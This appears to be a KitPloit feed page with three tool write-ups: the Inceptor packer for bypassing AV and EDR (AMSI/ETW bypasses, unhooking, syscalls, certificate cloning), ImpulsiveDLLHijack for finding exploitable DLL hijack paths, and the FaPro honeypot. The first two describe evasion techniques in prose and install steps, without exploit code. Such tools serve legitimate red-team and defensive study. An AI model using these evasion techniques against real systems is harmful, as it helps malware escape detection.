Inceptor is a template-based PE packer for Windows, designed to help penetration testers and red teamers to bypass common AV and EDR solutions. Inceptor has been designed with a focus on usability, and to allow extensive user customisation.

To have a good overview of what it was implemented and why, it might be useful to tak a look to the following resources:


Shellcode Transformation/Loading

Inceptor is able to convert existing EXE/DLL into shellcode using various open-source converters:

  • Donut: Donut is "The Converter". This tool is more like a piece of art by TheWover, and can be used to transform Native binaries, DLL, and .Net binaries into position independent code shellcode.
  • sRDI: By Monoxgas, this tool can convert existing naticcve DLL into PIC, which can then be injected as regular shellcode.
  • Pe2Sh: By Hasherazade, this tool can convert an existing native EXE into PIC shellcode, which can also be run as a normal EXE.

LI Encoders vs LD Encoders

Inceptor can encode, compress, or encrypt shellcode using different means. While developing the tool, I started differentiating between what I call loader-independent (LI) encoding, and loader-dependent (LD) encoding.

Loader-independent encoding is a type of encoding not managed by the template chosen by the user (loader). This usually means that the decoding stub is not part of the template, but embedded in the shellcode itself. Inceptor offers this kind of feature using the open-source tool sgn, which is used to make the payload polymorphic and undetectable using common signature detection.

Even strong at it is, Shikata-Ga-Nai is not really suitable for certain templates. For this reason, Inceptor also implements Loader-dependent encoders, which are designed to let the loader taking care of the decoding. As such, LD encoders install the decoding stub directly in the template. This kind of encoders, as implemented within Inceptor, are also "Chainable", meaning they can be chained together to encode a payload.

While using a chain of encoders can sometimes improve the obfuscation of a given payload, this technique can also expose multiple decoding routines, which can help Defenders to design signatures against them. For this reason, Inceptor offers multiple ways to obfuscate the final artifacts, hardening the RE process.

At the time of writing, the public version of Inceptor has been provided with the following encoders/compressors/encryptors:

  • Native
    • Xor
    • Nop (Insertion)
  • .NET
    • Hex
    • Base64
    • Xor
    • Nop (Insertion)
    • AES
    • Zlib
    • RLE
  • PowerShell
    • Hex
    • Base64
    • Xor
    • Nop (Insertion)
    • AES

Inceptor can validate an encoding chain both statically and dynamically, statically checking the decoders' input/output types, and also dynamically verifying the implementation with an independent implementation.

At any time, a user can easily validate a chain using the chain-validate.py utility.


AV Evasion Mechanisms

Inceptor also natively implements AV Evasion mechanisms, and as such, it offers the possibility to include AV evasion features to the payload in the form of "modules" (plugins).

The plugins which can be embedded are:

  • AMSI bypass
  • WLDP bypass
  • ETW bypass
  • Sandbox (Behavioural) Deception

EDR Evasion Mechanisms

Inceptor also implements EDR Evasion mechanisms, such as full unhooking, direct syscall invocation and manual DLL mapping. Direct Syscalls are implemented in C# using the outstanding "DInvoke" project, again by TheWover. In C/C++, Syscalls are implemented using SysWhispers and SysWhispers2 projects, by Jackson_T. In addition, Inceptor has built-in support for x86 Syscalls as well.

As the AV bypass features, these features can be enabled as modules, with the only difference that they require operating on a template which supports them. The techniques implemented so far are:

  • Full Unhooking
  • Manual DLL Mapping
  • Direct Syscalls

Obfuscation

Inceptor supports payload obfuscation by using external utils, such as ConfuserExand Chameleon, and provides support for C/C++ obfuscation using LLVM-Obfuscator, which is an IR-based obfuscator using the LLVM compilation platform.

  • PowerShell
  • C#
  • C/C++

Code Signing

Another feature of Inceptor is that it can code sign the resulting binary/dll by using the tool CarbonCopyUsually, files signed with code signing certificates are less strictly analysed. Many anti-malware products don't validate/verify these certificates.


Workflow

The full workflow can be summarized in the following high-level, and simplified scheme:



Installation

Inceptor has been designed to work on Windows. The update-config.py utility can locate the required Microsoft binaries and update the configuration accordingly. It might be required to install Microsoft Build Tools, the Windows SDK, and Visual Studio, update-config.py will guide the user on how to install the required dependencies.

git clone --recursive https://github.com/klezVirus/inceptor.git
cd inceptor
virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
cd inceptor
python update-config.py

Useful Notes

Default Loaders

The current version of Inceptor locates a specific template using a simple naming convention (don't change template names), and the set of arguments given by the user. Among the arguments, there is also the loader (-t). If not specified, the loader will be picked-up as a function of the file to pack, following this simple schema:

$ python inceptor.py -hh

[*] Default Loaders
Input File Extension SpecialCondition Guessed Filetype Default Loader Default Template
0 .raw NaN Shellcode Simple Loader Classic
1 .exe .NET Dotnet Executable Donut Classic
2 .exe NaN Native Executable Pe2Shellcode PE Load
3 .dll NaN Native Library sRDI Classic

Template name convention

It's very important to understand also the template name convention, to avoid misinterpreting an artifact behaviour.

  • Classic: a classic template usually means it uses the VirtualAlloc/VirtualAllocEx and CreateThread/CreateRemoteThread API to allocate and execute arbitrary code
  • Dinvoke: if a template contains only dinvoke (e.g classic-dinvoke.cs), it means it uses dynamic function resolution feature of dinvoke
  • dinvoke-subtechnique: a template containing dinvoke followed by another keyword is using a particular feature of dinvoke, like manual_mapping, overload_mapping, or syscalls
  • Syscalls: as the name suggest, this template is using syscalls
  • PE Load: this template tries to map a full PE into memory, without transforming it
  • Assembly Load: this template tries to execute a .NET assembly using reflection

Usage
$ usage: inceptor.py [-h] [-hh] [-Z] {native,dotnet,powershell} ...

inceptor: A Windows-based PE Packing framework designed to help
Red Team Operators to bypass common AV and EDR solutions

positional arguments:
{native,dotnet,powershell}
native Native Binaries Generator
dotnet .NET Binaries Generator
powershell PowerShell Wrapper Scripts Generator

optional arguments:
-h, --help show this help message and exit
-hh Show functional table
-Z, --check Check file against ThreatCheck

Next Developments
  • New Template Engine
  • New Templates
  • New Encoders
  • C# Code-Based obfuscation

Resources


βœ‡ KitPloit - PenTest & Hacking Tools

ImpulsiveDLLHijack - C# Based Tool Which Automates The Process Of Discovering And Exploiting DLL Hijacks In Target Binaries

By: Zion3R β€”


C# based tool which automates the process of discovering and exploiting DLL Hijacks in target binaries. The Hijacked paths discovered can later be weaponized during RedTeam Operations to evade EDR's.


1. Methodological Approach :

The tool basically acts on automating following stages performed for DLL Hijacking:

  • Discovery - Finding Potentially Vulnerable DLL Hijack paths
  • Exploitation - Confirming whether the Confirmatory DLL was been loaded from the Hijacked path leading to a confirmation of 100% exploitable DLL Hijack!

Discovery Methodology :

  • Provide Target binary path to ImpulsiveDLLHijack.exe
  • Automation of ProcMon along with the execution of Target binary to find Potentially Vulnerable DLL Hijackable paths.

Exploitation Methodology :

  • Parse Potentially Vulnerable DLL Hijack paths from CSV generated automatically via ProcMon.

  • Copy the Confirmatory DLL (as per the PE architecture) to the hijack paths one by one and execute the Target Binary for predefined time period simultaneously.

  • As the DLL hijacking process is in progress following are the outputs which can be gathered from the Hijack Scenario:

    • The Confirmatory DLL present on the potentially vulnerable Hijackable Path is loaded by the Target Binary we get following output on the console stating that the DLL Hijack was successful - DLL Hijack Successful -> DLLName: | <Target_binary_name>
    • The Confirmatory DLL present on the potentially vulnerable Hijackable Path is not loaded by the Target Binary we get following output on the console stating that the DLL Hijack was unsuccessful - DLL Hijack Unsuccessful -> <DLL_Path>

    Entry Point Not Found Scenarios:

    • The Confirmatory DLL present on the potentially vulnerable Hijackable Path is not loaded by the Target Binary as the Entry Point of the DLL is different from our default entry point "DllMain" throwing an error - "Entry Point Not Found", we get following output on the console stating that the DLL Hijack was hijackable if the entry point was correct -> DLL Hijack Successful -> [Entry Point Not Found - Manual Analysis Required!]: <Hijack_path>
    • The Confirmatory DLL present on the potentially vulnerable Hijackable Path is executed by the Target Binary even after the Entry Point of the DLL is different from our default entry point "DllMain" throwing an error "Entry Point Not Found", we get following output on the console stating that the DLL Hijack was success even after the entry point was not correct -> DLL Hijack Successful -> [Entry Point Not Found]: <Hijack_path>

Note: The "Entry Point not found" Error is been handled by the code programmatically no need to close the MsgBox manually :) # Rather this would crash the code further****

  • Once the DLL Hijacking process is completed for every Potentially Vulnerable DLL Hijack path we get the final output on the console as well as in a text file (C:\DLLLogs\output_logs.txt) in the following format:

    • <DLLHijack_path> --> DLL Hijack Successful (if the Hijack was successful)
    • <DLLHijack_path> --> DLL Hijack Unuccessful (if the Hijack was unsuccessful)
    • <DLLHijack_path> --> DLL Hijack Successful [Entry Point Not Found - Manual Analysis Required] (if the Entry point was not found but can be successful after manual analysis)
    • <DLLHijack_path> --> DLL Hijack Successful [Entry Point Not Found] (if the hijack was successful even after the entry point was not found)
    • <DLLHijack_path> --> Copy: Access to Path is Denied (Access denied)

**These Confirmed DLL Hijackable paths can later be weaponized during a Red Team Engagement to load a Malicious DLL Implant via a legitimate executable (such as OneDrive,Firefox,MSEdge,"Bring your own LOLBINs" etc.) and bypass State of the art EDR's as most of them fail to detect DLL Hijacking as assessed by George Karantzas and Constantinos Patsakis as mentioned in there research paper: https://arxiv.org/abs/2108.10422


2. Prerequisites:
  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • Custom Confirmatory DLL's :
    • These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path
    • Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)
    • 32Bit dll name should be: maldll32.dll
    • 64Bit dll name should be: maldll64.dll
    • Install NuGet Package:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)

Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.

  • Build and Setup Information:

    • ImpulsiveDLLHijack

      • Clone the repository in Visual Studio
      • Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Build the project!
      • The ImpulsiveDLLHijack.exe will be inside the bin directory.
    • And for Confirmatory DLL's:

      • Clone the repository in Visual Studio
      • Build the project with x86 and x64
      • Rename x86 release as maldll32.dll and x64 release as maldll64.dll
    • Setup: Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))


3. Usage:

Β 


4. Examples:
  • Target Executable: OneDrive.exe

  • Stage: Discovery

  • Stage: Exploitation

    • Successful DLL Hijacks:


    Β 

    • Unsuccessful DLL Hijacks:


    Β 

    • DLL is not loaded as the entry point is not identical! Manual Analysis might make it a successful DLL Hijack :)


    Β 

    • DLL Hijack successful even after unidentical entry point!


    Β 

  • Stage: Final Results and Logs

    • C:\DLLLogs\output_logs.txt:


    Β 

Thankyou, Feedback would be greatly appreciated! - knight!



βœ‡ KitPloit - PenTest & Hacking Tools

Fapro - Free, Cross-platform, Single-file mass network protocol server simulator

By: Zion3R β€”


FaPro is a Fake Protocol Server tool, Can easily start or stop multiple network services.

The goal is to support as many protocols as possible, and support as many deep interactions as possible for each protocol.


Features
  • Supported Running Modes:
    • Local Machine
    • Virtual Network
  • Supported Protocols:
    • DNS
    • DCE/RPC
    • EIP
    • Elasticsearch
    • FTP
    • HTTP
    • IEC 104
    • Memcached
    • Modbus
    • MQTT
    • MySQL
    • RDP
    • Redis
    • S7
    • SMB
    • SMTP
    • SNMP
    • SSH
    • Telnet
    • VNC
    • IMAP
    • POP3
  • Use TcpForward to forward network traffic
  • Support tcp syn logging

Protocol simulation demos

Rdp

Support credssp ntlmv2 nla authentication.

Support to configure the image displayed when user login.


SSH

Support user login.

Support fake terminal commands, such as id, uid, whoami, etc.

Account format: username:password:home:uid


IMAP & SMTP

Support user login and interaction.



Mysql

Support sql statement query interaction



HTTP

Support website clone, You need to install the chrome browser and chrome driver to work.


Quick Start

Generate Config

The configuration of all protocols and parameters is generated by genConfig subcommand.

Use 172.16.0.0/16 subnet to generate the configuration file:

fapro genConfig -n 172.16.0.0/16 > fapro.json

Or use local address instead of the virtual network:

fapro genConfig > fapro.json

Run the protocol simulator

Run FaPro in verbose mode and start the web service on port 8080:

fapro run -v -l :8080

Tcp syn logging

For windows users, please install winpcap or npcap.


Log analysis

Use ELK to analyze protocol logs:



Configuration

This section contains the sample configuration used by FaPro.

{
"version": "0.38",
"network": "127.0.0.1/32",
"network_build": "localhost",
"storage": null,
"geo_db": "/tmp/geoip_city.mmdb",
"hostname": "fapro1",
"use_logq": true,
"cert_name": "unknown",
"syn_dev": "any",
"exclusions": [],
"hosts": [
{
"ip": "127.0.0.1",
"handlers": [
{
"handler": "dcerpc",
"port": 135,
"params": {
"accounts": [
"administrator:123456",
],
"domain_name": "DESKTOP-Q1Test"
}
}
]
}
]
}
  • version: Configuration version.
  • network: The subnet used by the virtual network or the address bound to the local machine(Local mode).
  • network_build: Network mode(supported value: localhost, all, userdef)
    • localhost: Local mode, all services are listening on the local machine
    • all: Create all hosts in the subnet(i.e., Can ping all the host in the subnet)
    • userdef: Create only the hosts specified in the hosts configuration.
  • storage: Specify the storage used for log collection, support sqlite, mysql, elasticsearch. e.g.
  • geo_db: MaxMind geoip2 database file path, used to generate ip geographic location information. if you use Elasticsearch storage, never need this field, it will be automatically generated using the geoip processor of Elasticsearch.
  • hostname: Specify the host field in the log.
  • use_logq: Use local disk message queue to save logs, and then send it to remote mysql or Elasticsearch to prevent remote log loss.
  • cert_name: Common name of the generated certificate.
  • syn_dev: Specify the network interface used to capture tcp syn packets. If it is empty, the tcp syn packet will not be recorded. On windows, the device name is like "\Device\NPF_{xxxx-xxxx}".
  • exclusions: Exclude remote ips from logs.
  • hosts: Each item is a host configuration.
  • handlers: Service configuration, the service configured on the host, each item is a service configuration.
  • handler: Service name (i.e., protocol name)
  • params: Set the parameters supported by the service.

Example

Create a virtual network, The subnet is 172.16.0.0/24, include 2 hosts,

172.16.0.3 run dns, ssh service,

and 172.16.0.5 run rpc, rdp service,

protocol access logs are saved to elasticsearch, exclude the access log of 127.0.0.1.

{
"version": "0.38",
"network": "172.16.0.0/24",
"network_build": "userdef",
"storage": "es://http://127.0.0.1:9200",
"use_logq": true,
"cert_name": "unknown",
"syn_dev": "any",
"geo_db": "",
"exclusions": ["127.0.0.1"],
"hosts": [
{
"ip": "172.16.0.3",
"handlers": [
{
"handler": "dns",
"port": 53,
"params": {
"accounts": [
"admin:123456"
],
"appname": "domain"
}
},
{
"handler": "ssh",
"port": 22,
"params": {
"accounts": [
"root:5555555:/root:0"
],
"prompt": "$ ",
"server_version": "SSH-2.0-OpenSSH_7.4"
}
}
]
},
{
"ip": "172.16.0.5",
"handlers": [
{
"handler": "dcerpc",
"port": 135,
"params": {
"accounts": [
"administrator:123456"
],
"domain_name": "DESKTOP-Q1Test"
}
},
{
"handler": "rdp",
"port": 3389,
"params": {
"accounts": [
"administrator:123456"
],
"auth": false,
"domain_name": "DESKTOP-Q1Test",
"image": "rdp.jpg",
"sec_layer": "auto"
}
}
]
}
]
}

FAQ

We have collected some frequently asked questions. Before reporting an issue, please search if the FAQ has the answer to your problem.


Contributing
  • Issues are welcome.


❌